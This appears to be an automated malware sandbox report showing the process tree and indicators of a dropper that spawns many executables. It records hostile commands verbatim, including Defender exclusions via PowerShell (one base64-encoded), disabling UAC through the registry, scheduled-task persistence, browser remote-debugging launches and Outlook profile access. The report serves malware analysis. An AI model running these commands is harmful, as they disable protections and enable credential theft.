5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
5984	chrome.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe
68	msedge.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1864	osfile01.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6044	regsvr32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 4988	1388	New Text Document mod.exe	105
PID 1388 wrote to memory of 4988	1388	New Text Document mod.exe	105
PID 1388 wrote to memory of 4988	1388	New Text Document mod.exe	105
PID 1388 wrote to memory of 3580	1388	New Text Document mod.exe	106
PID 1388 wrote to memory of 3580	1388	New Text Document mod.exe	106
PID 1388 wrote to memory of 3580	1388	New Text Document mod.exe	106
PID 3580 wrote to memory of 3084	3580	coinbase.exe	107
PID 3580 wrote to memory of 3084	3580	coinbase.exe	107
PID 3580 wrote to memory of 3084	3580	coinbase.exe	107
PID 3084 wrote to memory of 4656	3084	coinbase.tmp	108
PID 3084 wrote to memory of 4656	3084	coinbase.tmp	108
PID 3084 wrote to memory of 4656	3084	coinbase.tmp	108
PID 4656 wrote to memory of 5892	4656	coinbase.exe	109
PID 4656 wrote to memory of 5892	4656	coinbase.exe	109
PID 4656 wrote to memory of 5892	4656	coinbase.exe	109
PID 5892 wrote to memory of 6044	5892	coinbase.tmp	110
PID 5892 wrote to memory of 6044	5892	coinbase.tmp	110
PID 5892 wrote to memory of 6044	5892	coinbase.tmp	110
PID 6044 wrote to memory of 2548	6044	regsvr32.exe	111
PID 6044 wrote to memory of 2548	6044	regsvr32.exe	111
PID 6044 wrote to memory of 2548	6044	regsvr32.exe	111
PID 6044 wrote to memory of 3560	6044	regsvr32.exe	114
PID 6044 wrote to memory of 3560	6044	regsvr32.exe	114
PID 6044 wrote to memory of 3560	6044	regsvr32.exe	114
PID 6044 wrote to memory of 1100	6044	regsvr32.exe	116
PID 6044 wrote to memory of 1100	6044	regsvr32.exe	116
PID 6044 wrote to memory of 1100	6044	regsvr32.exe	116
PID 1388 wrote to memory of 4744	1388	New Text Document mod.exe	119
PID 1388 wrote to memory of 4744	1388	New Text Document mod.exe	119
PID 1388 wrote to memory of 4744	1388	New Text Document mod.exe	119
PID 1388 wrote to memory of 404	1388	New Text Document mod.exe	120
PID 1388 wrote to memory of 404	1388	New Text Document mod.exe	120
PID 1388 wrote to memory of 404	1388	New Text Document mod.exe	120
PID 1388 wrote to memory of 1864	1388	New Text Document mod.exe	121
PID 1388 wrote to memory of 1864	1388	New Text Document mod.exe	121
PID 1388 wrote to memory of 1864	1388	New Text Document mod.exe	121
PID 1388 wrote to memory of 3284	1388	New Text Document mod.exe	122
PID 1388 wrote to memory of 3284	1388	New Text Document mod.exe	122
PID 1388 wrote to memory of 3284	1388	New Text Document mod.exe	122
PID 1388 wrote to memory of 4968	1388	New Text Document mod.exe	123
PID 1388 wrote to memory of 4968	1388	New Text Document mod.exe	123
PID 1388 wrote to memory of 4968	1388	New Text Document mod.exe	123
PID 1388 wrote to memory of 4324	1388	New Text Document mod.exe	124
PID 1388 wrote to memory of 4324	1388	New Text Document mod.exe	124
PID 1388 wrote to memory of 4324	1388	New Text Document mod.exe	124
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 4324 wrote to memory of 5636	4324	6NPpGdC.exe	125
PID 1388 wrote to memory of 5640	1388	New Text Document mod.exe	127
PID 1388 wrote to memory of 5640	1388	New Text Document mod.exe	127
PID 1388 wrote to memory of 5640	1388	New Text Document mod.exe	127
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129
PID 5640 wrote to memory of 2388	5640	q3na5Mc.exe	129

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Downloads MZ/PE file
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Users\Admin\AppData\Local\Temp\a\esco.exe
  "C:\Users\Admin\AppData\Local\Temp\a\esco.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4988
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:6192
- C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe
  "C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3580
- - C:\Users\Admin\AppData\Local\Temp\is-ROEAB.tmp\coinbase.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-ROEAB.tmp\coinbase.tmp" /SL5="$90118,721126,73216,C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe
      "C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4656
    - - C:\Users\Admin\AppData\Local\Temp\is-K62OG.tmp\coinbase.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-K62OG.tmp\coinbase.tmp" /SL5="$19003E,721126,73216,C:\Users\Admin\AppData\Local\Temp\a\coinbase.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5892
      - C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\netapi32_2.ocx"
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:6044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx' }) { exit 0 } else { exit 1 }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\Admin\AppData\Roaming\netapi32_2.ocx' }) { exit 0 } else { exit 1 }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1100
- C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4744
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3364
- - C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cryptedprosp.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - outlook_office_path
    - outlook_win_path
    PID:2652
- C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe
  "C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:404
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4188
- - C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jKuil2m4oIniPNC.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2948
- C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe
  "C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1864
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\FicFXwDQ.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1652
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FicFXwDQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7C55.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1900
- - C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe
    "C:\Users\Admin\AppData\Local\Temp\a\osfile01.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5868
- C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe
  "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:3284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2584
- - C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe
    "C:\Users\Admin\AppData\Local\Temp\a\4KKi8Zrv9nyAmhR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4644
- C:\Users\Admin\AppData\Local\Temp\a\VBUN8fn.exe
  "C:\Users\Admin\AppData\Local\Temp\a\VBUN8fn.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4968
- C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe
  "C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4324
- - C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe
    "C:\Users\Admin\AppData\Local\Temp\a\6NPpGdC.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5636
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 788
    3⤵
    - Program crash
    PID:5060
- C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5640
- - C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\q3na5Mc.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2388
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:5984
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fff4133cc40,0x7fff4133cc4c,0x7fff4133cc58
        5⤵
        
        PID:4032
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2028,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2024 /prefetch:2
        5⤵
        
        PID:5124
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1888,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3
        5⤵
        
        PID:3240
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2476 /prefetch:8
        5⤵
        
        PID:5796
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4092
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3176,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4268 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5000
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
        5⤵
        
        PID:4664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4612 /prefetch:8
        5⤵
        
        PID:4520
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,2799402489450108709,5437843803284786528,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4604 /prefetch:8
        5⤵
        
        PID:1200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:68
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff404c46f8,0x7fff404c4708,0x7fff404c4718
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4152
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,2428792402167979921,14589666242206558247,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        5⤵
        
        PID:6080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,2428792402167979921,14589666242206558247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
        5⤵
        
        PID:3068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,2428792402167979921,14589666242206558247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
        5⤵
        
        PID:6076
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2088,2428792402167979921,14589666242206558247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2088,2428792402167979921,14589666242206558247,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4960
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ukn7g" & exit
      4⤵
      PID:6780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        5⤵
        Delays execution with timeout.exe
        
        PID:3912
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 788
    3⤵
    - Program crash
    PID:2404
- C:\Users\Admin\AppData\Local\Temp\a\random.exe
  "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5588
- C:\Users\Admin\AppData\Local\Temp\a\update.exe
  "C:\Users\Admin\AppData\Local\Temp\a\update.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2188
- - C:\Users\Admin\AppData\Local\Temp\WindowsLib.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsLib.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3972
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVwBpAG4AZABvAHcAcwBMAGkAYgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABXAGkAbgBkAG8AdwBzAEwAaQBiAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABMAGUAbgBnAHQAaAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABMAGUAbgBnAHQAaAAuAGUAeABlAA==
      4⤵
      PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe
      "C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe"
      4⤵
      PID:468
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2748
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        Modifies registry key
        
        PID:6404
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        5⤵
        
        PID:2572
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        Modifies registry key
        
        PID:5056
      - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        6⤵
        
        PID:2788
- C:\Users\Admin\AppData\Local\Temp\a\AA.exe
  "C:\Users\Admin\AppData\Local\Temp\a\AA.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5584
- - C:\Users\Admin\AppData\Local\Temp\tmpB3B1.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmpB3B1.tmp.exe"
    3⤵
    PID:4068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
